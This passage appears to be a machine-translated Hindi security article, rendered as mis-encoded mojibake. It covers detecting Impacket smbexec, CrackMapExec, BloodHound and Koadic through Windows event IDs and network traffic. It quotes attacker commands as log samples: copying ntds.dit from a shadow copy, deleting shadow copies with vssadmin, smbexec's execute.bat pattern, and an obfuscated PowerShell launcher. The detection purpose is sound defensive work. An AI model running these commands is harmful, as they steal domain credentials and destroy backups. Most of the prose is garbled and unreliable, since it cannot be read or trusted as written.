6. 4688 - рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдирд╛:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
7. 4688 - рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдирд╛:
"C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Smbexec
рдХрдИ рдкреЛрд╕реНрдЯ-рд╢реЛрд╖рдг рд╕рд╛рдзрдиреЛрдВ рдХреА рддрд░рд╣, рдЗрдореНрдкреИрдХреЗрдЯ рдореЗрдВ рд░рд┐рдореЛрдЯ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рд▓рд┐рдП рдореЙрдбреНрдпреВрд▓ рд╣реИрдВред рд╣рдо smbexec рдкрд░ рдзреНрдпрд╛рди рдХреЗрдВрджреНрд░рд┐рдд рдХрд░реЗрдВрдЧреЗ, рдЬреЛ рдПрдХ рд░рд┐рдореЛрдЯ рдорд╢реАрди рдкрд░ рдПрдХ рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред рдЗрд╕ рдореЙрдбреНрдпреВрд▓ рдХреЛ рдХрд┐рд╕реА рдкрд╛рд╕рд╡рд░реНрдб рдпрд╛ рдЙрд╕рдХреЗ рд╣реИрд╢ рдХреЗ рд╕рд╛рде SMB рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреА рднреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред рдЕрдВрдЬреАрд░ рдореЗрдВред 3 рд╣рдо рдПрдХ рдЙрджрд╛рд╣рд░рдг рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдРрд╕рд╛ рдЙрдкрдХрд░рдг рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, рдЗрд╕ рдорд╛рдорд▓реЗ рдореЗрдВ рдпрд╣ рдПрдХ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХрдВрд╕реЛрд▓ рд╣реИред
рдЕрдВрдЬреАрд░ред 3. рд╕реНрдордмреЗрдХреНрд╕реИрдХ рдЗрдВрдЯрд░рдПрдХреНрдЯрд┐рд╡ рдХрдВрд╕реЛрд▓рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдХреЗ рдмрд╛рдж smbexec рдореЗрдВ рдкрд╣рд▓рд╛ рдЪрд░рдг OpenSCManagerW рдХрдорд╛рдВрдб (15) рдХреЗ рд╕рд╛рде SCM рдЦреЛрд▓ рд░рд╣рд╛ рд╣реИред рдЕрдиреБрд░реЛрдз рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рд╣реИ: рдЗрд╕рдореЗрдВ, рдорд╢реАрди рдирд╛рдо рдлрд╝реАрд▓реНрдб рдХреЛ DUMMY рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 4. рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ рдЦреЛрд▓рдиреЗ рдХрд╛ рдЕрдиреБрд░реЛрдзрдЗрд╕рдХреЗ рдмрд╛рдж, CreateServiceW (12) рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ рдмрдирд╛рдИ рдЬрд╛рддреА рд╣реИред рд╕реНрдореЗрдХрдПрдХреНрд╕ рдХреЗ рдорд╛рдорд▓реЗ рдореЗрдВ, рд╣рдо рд╣рд░ рдмрд╛рд░ рдЯреАрдо рдХреЗ рдирд┐рд░реНрдорд╛рдг рдХреЗ рдПрдХ рд╣реА рддрд░реНрдХ рдХреЛ рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВред рдЕрдВрдЬреАрд░ рдореЗрдВред 5 рд╣рд░реЗ рд░рдВрдЧ рд╕реЗ рдХрдорд╛рдВрдб рдХреЗ рдЕрдкрд░рд┐рд╡рд░реНрддрдиреАрдп рдорд╛рдкрджрдВрдбреЛрдВ рдХрд╛ рд╕рдВрдХреЗрдд рдорд┐рд▓рддрд╛ рд╣реИ, рдкреАрд▓рд╛ - рд╣рдорд▓рд╛рд╡рд░ рдХреНрдпрд╛ рдмрджрд▓ рд╕рдХрддрд╛ рд╣реИред рдпрд╣ рдиреЛрдЯрд┐рд╕ рдХрд░рдирд╛ рдЖрд╕рд╛рди рд╣реИ рдХрд┐ рдирд┐рд╖реНрдкрд╛рджрди рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдирд╛рдо, рдЙрд╕рдХреА рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдФрд░ рдЖрдЙрдЯрдкреБрдЯ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдмрджрд▓рд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрдореНрдкреЗрдХреЗрдЯ рдореЙрдбреНрдпреВрд▓ рдХреЗ рддрд░реНрдХ рдХрд╛ рдЙрд▓реНрд▓рдВрдШрди рдХрд┐рдП рдмрд┐рдирд╛ рдмрд╛рдХреА рдХреЛ рдФрд░ рдЕрдзрд┐рдХ рдХрдард┐рди рдмрджрд▓рд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 5. рд╕реЗрд╡рд╛ рдирд┐рдпрдВрддреНрд░рдг рдкреНрд░рдмрдВрдзрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рд╕реЗрд╡рд╛ рдмрдирд╛рдиреЗ рдХрд╛ рдЕрдиреБрд░реЛрдзSmbexec рднреА рд╡рд┐рдВрдбреЛрдЬ рдЗрд╡реЗрдВрдЯ рд▓реЙрдЧ рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рдирд┐рд╢рд╛рди рдЫреЛрдбрд╝ рджреЗрддрд╛ рд╣реИред IPconfig рдХрдорд╛рдВрдб рдХреЗ рд╕рд╛рде рдЗрдВрдЯрд░реЗрдХреНрдЯрд┐рд╡ рд╢реЗрд▓ рдХреЗ рд▓рд┐рдП рд╡рд┐рдВрдбреЛрдЬ рд╕рд░реНрд╡рд░ 2016 рд▓реЙрдЧ рдореЗрдВ, рд╣рдо рдШрдЯрдирд╛рдУрдВ рдХреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдореБрдЦреНрдп рдЕрдиреБрдХреНрд░рдо рджреЗрдЦреЗрдВрдЧреЗ:
1. 4697 - рдкреАрдбрд╝рд┐рдд рдХреА рдорд╢реАрди рдкрд░ рд╕реЗрд╡рд╛ рдХреА рд╕реНрдерд╛рдкрдирд╛:
%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
2. 4688 - рдкреИрд░рд╛рдЧреНрд░рд╛рдл 1 рд╕реЗ рддрд░реНрдХреЛрдВ рдХреЗ рд╕рд╛рде cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдирд┐рд░реНрдорд╛рдгред
3. 5145 - C $ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ __output рдлрд╝рд╛рдЗрд▓ рдкрд░ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреА рдЬрд╛рдБрдЪред
4. 4697 - рдкреАрдбрд╝рд┐рдд рдХреА рдорд╢реАрди рдкрд░ рд╕реЗрд╡рд╛ рдХреА рд╕реНрдерд╛рдкрдирд╛ред
%COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
5. 4688 - рдЕрдиреБрдЪреНрдЫреЗрдж 4 рд╕реЗ рддрд░реНрдХреЛрдВ рдХреЗ рд╕рд╛рде cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдирд╛ред
6. 5145 - рд╕реА $ рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА рдореЗрдВ __output рдлрд╝рд╛рдЗрд▓ рдХреЗ рдПрдХреНрд╕реЗрд╕ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреА рдЬрд╛рдБрдЪ рдХрд░рдирд╛ред
рдЗрдВрдкреЗрдХреЗрдЯ, рд╣рдорд▓реЗ рдХреЗ рдЙрдкрдХрд░рдг рд╡рд┐рдХрд╕рд┐рдд рдХрд░рдиреЗ рдХреА рдиреАрдВрд╡ рд╣реИред рдпрд╣ рд╡рд┐рдВрдбреЛрдЬ рдХреЗ рдмреБрдирд┐рдпрд╛рджреА рдврд╛рдВрдЪреЗ рдореЗрдВ рд▓рдЧрднрдЧ рд╕рднреА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рд╕рдорд░реНрдерди рдХрд░рддрд╛ рд╣реИ рдФрд░ рдПрдХ рд╣реА рд╕рдордп рдореЗрдВ рдЗрд╕рдХреА рдЕрдкрдиреА рд╡рд┐рд╢реЗрд╖рддрд╛рдПрдВ рд╣реИрдВред рдпрд╣рд╛рдБ рд╡рд┐рд╢рд┐рд╖реНрдЯ winreg рдЕрдиреБрд░реЛрдз рд╣реИрдВ, рдФрд░ SCM API рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрдорд╛рдВрдб рдХреЗ рдЪрд╛рд░рд┐рддреНрд░рд┐рдХ рдЧрдарди рдФрд░ рдлрд╝рд╛рдЗрд▓ рдирд╛рдо рдкреНрд░рд╛рд░реВрдк рдФрд░ SMB рд╢реЗрдпрд░ SYSTEM32 рдХреЗ рд╕рд╛рде рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред
CRACKMAPEXEC
CME рдЯреВрд▓ рдХреЛ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдЙрди рдирд┐рдпрдорд┐рдд рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЬрд╝рд╛рдЗрди рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдЬреЛ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рднреАрддрд░ рдЖрдЧреЗ рдмрдврд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд░реНрд╢рди рдХрд░рдирд╛ рд╣реИред рдпрд╣ рдЖрдкрдХреЛ рдХреБрдЦреНрдпрд╛рдд рдПрдореНрдкрд╛рдпрд░ рдПрдЬреЗрдВрдЯ рдФрд░ рдореАрдЯрд░рдкрд░рдЯрд░ рдХреЗ рд╕рд╛рде рдорд┐рд▓рдХрд░ рдХрд╛рдо рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдЧреБрдкреНрдд рд░реВрдк рд╕реЗ рдЖрджреЗрд╢реЛрдВ рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╕реАрдПрдордИ рдЙрдиреНрд╣реЗрдВ рдмрд╛рдзрд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб (рдПрдХ рдЕрд▓рдЧ рдЦреБрдлрд┐рдпрд╛ рдЙрдкрдХрд░рдг) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ, рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рд╕рдХреНрд░рд┐рдп рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╕рддреНрд░ рдХреЗ рд▓рд┐рдП рдЦреЛрдЬ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИред
рдЦреЛрдЬреА рдХреБрддреНрддрд╛
рдПрдХ рд╕реНрд╡рддрдВрддреНрд░ рдЙрдкрдХрд░рдг рдХреЗ рд░реВрдк рдореЗрдВ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рднреАрддрд░ рдЙрдиреНрдирдд рдмреБрджреНрдзрд┐ рдХреЗ рд▓рд┐рдП рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдпрд╣ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ, рдорд╢реАрдиреЛрдВ, рд╕рдореВрд╣реЛрдВ, рд╕рддреНрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдбреЗрдЯрд╛ рдПрдХрддреНрд░ рдХрд░рддрд╛ рд╣реИ рдФрд░ рдкреЙрд╡рд░рд╢реЗрд▓ рдпрд╛ рдмрд╛рдЗрдирд░реА рдлрд╝рд╛рдЗрд▓ рдкрд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рд░реВрдк рдореЗрдВ рдЖрддрд╛ рд╣реИред LDAP рдпрд╛ SMB- рдЖрдзрд╛рд░рд┐рдд рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рд╕реВрдЪрдирд╛ рдПрдХрддреНрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рд╕реАрдПрдордИ рдПрдХреАрдХрд░рдг рдореЙрдбреНрдпреВрд▓ рдЖрдкрдХреЛ рдкреАрдбрд╝рд┐рдд рдХреЛ рдорд╢реАрди рд╕реЗ рд░рдХреНрддрдзреНрд╡рдЬ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ, рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рдмрд╛рдж рдПрдХрддреНрд░ рдХрд┐рдП рдЧрдП рдбреЗрдЯрд╛ рдХреЛ рдЪрд▓рд╛рдиреЗ рдФрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдЙрдиреНрд╣реЗрдВ рдХрдо рдзреНрдпрд╛рди рджреЗрдиреЗ рдпреЛрдЧреНрдп рдмрдирд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЧреНрд░рд╛рдлрд┐рдХрд▓ рд╢реЗрд▓ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдПрдХрддреНрд░рд┐рдд рдбреЗрдЯрд╛ рдХреЛ рд░реЗрдЦрд╛рдВрдХрди рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рд╕реНрддреБрдд рдХрд░рддрд╛ рд╣реИ, рдЬреЛ рдЖрдкрдХреЛ рд╣рдорд▓рд╛рд╡рд░ рдорд╢реАрди рд╕реЗ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд▓рд┐рдП рд╕рдмрд╕реЗ рдЫреЛрдЯрд╛ рд░рд╛рд╕реНрддрд╛ рдЦреЛрдЬрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 6. рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдЗрдВрдЯрд░рдлрд╝реЗрд╕рдкреАрдбрд╝рд┐рдд рдХреА рдорд╢реАрди рдкрд░ рдЪрд▓рдиреЗ рдХреЗ рд▓рд┐рдП, рдореЙрдбреНрдпреВрд▓ ATSVC рдФрд░ SMB рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдПрдХ рдХрд╛рд░реНрдп рдмрдирд╛рддрд╛ рд╣реИред ATSVC рд╡рд┐рдВрдбреЛрдЬ рдЯрд╛рд╕реНрдХ рд╢реЗрдбреНрдпреВрд▓рд░ рдХреЗ рд╕рд╛рде рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рд╣реИред CME рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рдХрд╛рд░реНрдп рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЕрдкрдиреЗ NetrJobAdd (1) рдлрд╝рдВрдХреНрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред CME рдореЙрдбреНрдпреВрд▓ рдХреНрдпрд╛ рднреЗрдЬрддрд╛ рд╣реИ рдЗрд╕рдХрд╛ рдПрдХ рдЙрджрд╛рд╣рд░рдг рдЕрдВрдЬреАрд░ рдореЗрдВ рджрд┐рдЦрд╛рдпрд╛ рдЧрдпрд╛ рд╣реИред 7: рдпрд╣ cmd.exe рдХреЗ рд▓рд┐рдП рдПрдХ рдХреЙрд▓ рд╣реИ рдФрд░ рдПрдХреНрд╕рдПрдордПрд▓ рдкреНрд░рд╛рд░реВрдк рдореЗрдВ рддрд░реНрдХреЛрдВ рдХреЗ рд░реВрдк рдореЗрдВ рдЕрд╕реНрдкрд╖реНрдЯ рдХреЛрдб рд╣реИред
рдЪрд┐рддреНрд░ 7ред рд╕реАрдПрдордИ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдХрд╛рд░реНрдп рдмрдирд╛рдирд╛рдЯрд╛рд╕реНрдХ рдкреВрд░рд╛ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж, рдкреАрдбрд╝рд┐рдд рдХреА рдорд╢реАрди рдиреЗ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдХреЛ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛, рдФрд░ рдпрд╣ рдЯреНрд░реИрдлрд┐рдХ рдореЗрдВ рджреЗрдЦрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдореЙрдбреНрдпреВрд▓ рдорд╛рдирдХ рд╕рдореВрд╣реЛрдВ, рдбреЛрдореЗрди рдореЗрдВ рд╕рднреА рдорд╢реАрдиреЛрдВ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдПрдХ рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, SRVSVC NetSessEnum рдЕрдиреБрд░реЛрдз рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рдХреНрд░рд┐рдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рддреНрд░реЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП LDAP рдкреНрд░рд╢реНрдиреЛрдВ рдХреА рд╡рд┐рд╢реЗрд╖рддрд╛ рд╣реИред
рдЕрдВрдЬреАрд░ред 8. SMB рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░реЛрдВ рдХреА рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдСрдбрд┐рдЯ рд╕рдХреНрд╖рдо рдХреЗ рд╕рд╛рде рдкреАрдбрд╝рд┐рдд рдХреА рдорд╢реАрди рдкрд░ рд░рдХреНрддрдзреНрд╡рдЬ рдХрд╛ рдкреНрд░рдХреНрд╖реЗрдкрдг рдЖрдИрдбреА 4688 (рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд┐рд░реНрдорд╛рдг) рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдирд╛рдо
┬лC:\Windows\System32\cmd.exe┬╗
ред рдЗрд╕рдореЗрдВ рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рддрд░реНрдХ рд╣реИрдВ:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , тАж , 40,41 )-jOIN'' ) "
Enum_avproducts
рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдФрд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдХреЗ рджреГрд╖реНрдЯрд┐рдХреЛрдг рд╕реЗ, enum_avproducts рдореЙрдбреНрдпреВрд▓ рдмрд╣реБрдд рджрд┐рд▓рдЪрд╕реНрдк рд╣реИред WMI рд╡рд┐рднрд┐рдиреНрди рд╡рд┐рдВрдбреЛрдЬ рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рд╕реЗ рдбреЗрдЯрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП WQL рдХреНрд╡реЗрд░реА рднрд╛рд╖рд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬреЛ рдЕрдирд┐рд╡рд╛рд░реНрдп рд░реВрдк рд╕реЗ рдЗрд╕ CME рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рдпрд╣ рдкреАрдбрд╝рд┐рдд рдХреЗ рдорд╢реАрди рдкрд░ рд╕реНрдерд╛рдкрд┐рдд рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрд╛рдпреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдПрдВрдЯреАрд╕реНрдкрд╛рдИрд╡реЗрдпрд░рдкреНрд░реЛрдбрдХреНрдЯ рдФрд░ рдПрдВрдЯреАрдПрдорд░рд╕рдкреНрд░реЛрдбрдХреНрдЯ рдХрдХреНрд╖рд╛рдУрдВ рдХреЗ рд▓рд┐рдП рдЕрдиреБрд░реЛрдз рдХрд░рддрд╛ рд╣реИред рдЖрд╡рд╢реНрдпрдХ рдбреЗрдЯрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдореЙрдбреНрдпреВрд▓ рд░реВрдЯ \ SecurityCenter2 рдирд╛рдорд╕реНрдерд╛рди рд╕реЗ рдЬреБрдбрд╝рддрд╛ рд╣реИ, рдлрд┐рд░ WQL рдХреНрд╡реЗрд░реА рдЙрддреНрдкрдиреНрди рдХрд░рддрд╛ рд╣реИ рдФрд░ рдПрдХ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИред рдЕрдВрдЬреАрд░ рдореЗрдВред рдЪрд┐рддреНрд░ 9 рдРрд╕реЗ рдЕрдиреБрд░реЛрдзреЛрдВ рдФрд░ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рджрд░реНрд╢рд╛рддрд╛ рд╣реИред рд╣рдорд╛рд░реЗ рдЙрджрд╛рд╣рд░рдг рдореЗрдВ, рд╡рд┐рдВрдбреЛрдЬ рдбрд┐рдлреЗрдВрдбрд░ рдкрд╛рдпрд╛ рдЧрдпрд╛ рдерд╛ред
рдЕрдВрдЬреАрд░ред 9. enum_avproducts рдореЙрдбреНрдпреВрд▓ рдХреА рдиреЗрдЯрд╡рд░реНрдХ рдЧрддрд┐рд╡рд┐рдзрд┐рдЕрдХреНрд╕рд░, WMI рдСрдбрд┐рдЯ (рдЯреНрд░реЗрд╕ WMI- рдЧрддрд┐рд╡рд┐рдзрд┐), рдЬрд┐рди рдШрдЯрдирд╛рдУрдВ рдореЗрдВ рдЖрдк WQL рдкреНрд░рд╢реНрдиреЛрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЙрдкрдпреЛрдЧреА рдЬрд╛рдирдХрд╛рд░реА рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ, рдЙрдиреНрд╣реЗрдВ рдмрдВрдж рдХрд░ рджрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рд▓реЗрдХрд┐рди рдЕрдЧрд░ рдЗрд╕реЗ рдЪрд╛рд▓реВ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдЕрдЧрд░ enum_avproducts рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рддреА рд╣реИ, рддреЛ ID 11 рдХреЗ рд╕рд╛рде рдИрд╡реЗрдВрдЯ рдХреЛ рд╕рд╣реЗрдЬрд╛ рдЬрд╛рдПрдЧрд╛ред рдЗрд╕рдореЗрдВ рдЙрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рдирд╛рдо рд╣реЛрдЧрд╛, рдЬрд┐рд╕рдиреЗ рдЕрдиреБрд░реЛрдз рднреЗрдЬрд╛ рд╣реИ рдФрд░ рд░реВрдЯ \ SecurityCenter2 рдирд╛рдорд╕реНрдерд╛рди рдореЗрдВ рдирд╛рдо рд╣реИред
рд╕реАрдПрдордИ рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕реЗ рдкреНрд░рддреНрдпреЗрдХ рдиреЗ рдЕрдкрдиреА рд╕реНрд╡рдпрдВ рдХреА рдХрд▓рд╛рдХреГрддрд┐рдпреЛрдВ рдХреЛ рдкреНрд░рдХрдЯ рдХрд┐рдпрд╛, рдЪрд╛рд╣реЗ рд╡рд╣ рд╡рд┐рд╢рд┐рд╖реНрдЯ WQL рдкреНрд░рд╢реНрди рд╣реЛрдВ рдпрд╛ рдХрд╛рд░реНрдп рд╢реЗрдбреНрдпреВрд▓рд░ рдореЗрдВ рдПрдХ рдирд┐рд╢реНрдЪрд┐рдд рдкреНрд░рдХрд╛рд░ рдХреЗ рдХрд╛рд░реНрдп рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдЬрд┐рд╕рдореЗрдВ рдУрдмреНрдпреВрд╢рди рдФрд░ рдПрд▓рдбреАрдПрдкреА рдФрд░ рдПрд╕рдПрдордмреА рдореЗрдВ рдмреНрд▓рдбрд╣рд╛рдЙрдВрдб рдХреЗ рд▓рд┐рдП рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЧрддрд┐рд╡рд┐рдзрд┐ рд╣реЛред
KOADIC
Koadic рдХреА рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╡рд┐рд╢реЗрд╖рддрд╛ рдЕрдВрддрд░реНрдирд┐рд╣рд┐рдд рд╡рд┐рдВрдбреЛрдЬрд╝ рджреБрднрд╛рд╖рд┐рдпреЛрдВ рдЬрд╛рд╡рд╛рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдФрд░ VBScript рдХрд╛ рдЙрдкрдпреЛрдЧ рд╣реИред рдЗрд╕ рдЕрд░реНрде рдореЗрдВ, рдпрд╣ рдЬрдореАрди рд╕реЗ рджреВрд░ рд░рд╣рдиреЗ рдХреА рдкреНрд░рд╡реГрддреНрддрд┐ рдХрд╛ рдЕрдиреБрд╕рд░рдг рдХрд░рддрд╛ рд╣реИ - рдЕрд░реНрдерд╛рдд, рдЗрд╕рдореЗрдВ рдХреЛрдИ рдмрд╛рд╣рд░реА рдирд┐рд░реНрднрд░рддрд╛ рдирд╣реАрдВ рд╣реИ рдФрд░ рдорд╛рдирдХ рд╡рд┐рдВрдбреЛрдЬ рдЯреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рдпрд╣ рдкреВрд░реНрдг рдХрдорд╛рдВрдб рдПрдВрдб рдХрдВрдЯреНрд░реЛрд▓ (CnC) рдХреЗ рд▓рд┐рдП рдПрдХ рдЙрдкрдХрд░рдг рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рд╕рдВрдХреНрд░рдордг рдХреЗ рдмрд╛рдж, рдорд╢реАрди рдкрд░ рдПрдХ "рдкреНрд░рддреНрдпрд╛рд░реЛрдкрдг" рд╕реНрдерд╛рдкрд┐рдд 